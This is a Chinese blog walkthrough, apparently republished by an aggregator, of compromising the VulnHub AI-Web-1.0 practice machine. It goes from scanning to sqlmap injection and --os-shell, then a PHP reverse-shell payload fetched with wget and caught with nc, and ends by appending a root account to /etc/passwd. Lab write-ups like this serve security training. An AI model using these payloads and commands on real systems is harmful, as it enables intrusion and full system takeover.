Al-Web-1.0靶机渗透

Posted 别再期待了

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Al-Web-1.0靶机渗透相关的知识,希望对你有一定的参考价值。

                               Al-Web-1.0靶机渗透

前期准备:1.靶机下载网址:https://www.vulnhub.com/entry/ai-web-1,353/

                  2.渗透机 kali IP地址:192.168.75.128

环境配置:下载好虚拟机后使用VM打开,net连接模式

 

渗透开始:

1.授权

因为是自己下载搭建靶机进行渗透,所以此步省略

2.信息收集

2.1 收集目标IP地址

netdiscover

使用这条命令确定目标靶机IP地址

 

 可知,目标靶机IP地址为 192.168.75.134

 

因为靶机和渗透机是同在一个网段的,也可以使用

nmap -sP 192.168.75.0/24

 

 同样也可扫描到目标靶机IP地址

 

2.2 收集目标开放端口和服务

nmap -A  IP地址

使用这条命令查看目标靶机开放的端口

 

   目标开放了80端口,开启了http服务,并扫描出了目标的一些目录

果断访问

 发现没什么东西,只有这一句话,没什么用

 

2.3 收集目标靶机网页目录

dirb http://目标IP地址

使用这条命令可以使用dirb爆破目标网页目录

 

 爆破出目标靶机网页下有 index.html robots.txt  server-seatus 

 

依次访问,最终在robots.txt中发现了两个目录

 

尝试访问/m3diNf0/,没有权限。扫描/m3diNf0/目录

 

 存在info.php文件,查看

 

 再次依次进行访问,最后发现在/se3reTdir777/目录下,存有一个输入框

输入万能的SQL漏洞探测  ’  来判断有无SQL注入漏洞

 

 

存在SQL注入漏洞,打开sqlmap进行数据库爆破

 

打开burpsuite进行抓包

 

 成功抓取到数据包

 

尝试用SQLmap跑一下注入点

sqlmap -u "http://172.16.1.195/se3reTdir777/" --data "uid=1&Operation=Submit"  --dbs

 

 爆破出两个库 aiweb1和information_schema

 

爆破aiweb1的表名

sqlmap -u "http://172.16.1.195/se3reTdir777/" --data "uid=1&Operation=Submit"  -D aiweb1 --tables

 

爆破出两个表 user和systemUser

 

爆破user表里面的字段

sqlmap -u" http://192.168.75.134/se3reTdir777" --data \'uid=123&peration=Submit\' -D aiweb1 -T user -columns

 

 发现并没有我们想要的数据,寻找其他利用点

 

3.漏洞利用

尝试使用SQLmap的--os-shell命令

  os-shell执行条件有三个:

    网站必须是root权限

    网站的绝对路径已知

    GPC为off(php主动转义的功能关闭)

 使用命令 

sqlmap -u" http://192.168.75.134/se3reTdir777" --data \'uid=123&peration=Submit\' --os-shell

  依次选择 php  custom location(s)

根据前面找到的info.php文件暴露的信息,绝对路径选择:

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

 

成功图如下

 但拿到的权限很低,需要进行提权

 

4.权限提升

成功后立马在渗透机里面准备一个php文件,内容为

<?php
$sock=fsockopen("192.168.75.128",9966);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
(注意:这里的ip地址192.168.75.128是你的kali的ip,端口可以随便写,不要冲突就行,后面还要使用到,其他建议照抄)

开启另外一个命令窗口,使用python搭建一个简易服务器

 后面的5555为你上面创建的php文件中的端口

 

这时在浏览器中输入127.0.0.1:端口号就可以看到你刚刚写的文件了

 

然后回到我们sqlmap写shell的那个界面

wget -S http://你本机的IP地址:你上面自己填写的端口号/你上面写的php文件名

  

 

 下载完成

 有时候可能会出现这种情况,多试两次就好了

 

然后换一个窗口,使用nc -lvp 9966监听端口

 

回到我们sqlmap写shell的那个界面,运行刚刚下载好的那个文件

 

 

 

正常情况下,这样就运行成功了

 

 

 

 

可以用id,whoami等命令查看一些信息

 

 

但是这样看并不舒服,可以使用python提升为交互式shell,也就是我们平常所看到的命令行窗口形式

python -c \'import pty;pty.spawn("/bin/bash")\'

 

查看网站用户权限,发现可以读取passwd

 

 

增加一个root权限用户,先对密码进行加密

openssl passwd -1 -salt abc 000000

 

 然后再写入自己创建的账号和密码

echo \'abc:$1$abc$yzqAxwzjwaO0BUFj9nRwF/:0:0::/root:/bin/bash\'>>/etc/passwdsu

 

 

切换用户  

su abc

  

 

 至此,拿到管理员权限后,这台靶机就已经完全被破解了

 

 

后言:最近一直在学习,但是学习的东西很多很杂,于是便把自己的学习成果记录下来,便利自己,帮助他人。希望本篇文章能对你有所帮助,有错误的地方,欢迎指出!!!

以上是关于Al-Web-1.0靶机渗透的主要内容,如果未能解决你的问题,请参考以下文章

靶机渗透HACKME: 1

靶机渗透HACKME: 1

靶机渗透HACKME: 1

靶机DC-8(详细渗透,适合新手渗透)

靶机渗透lazysysadmin

靶机渗透 HACKME-2 (详细渗透,适合新手渗透)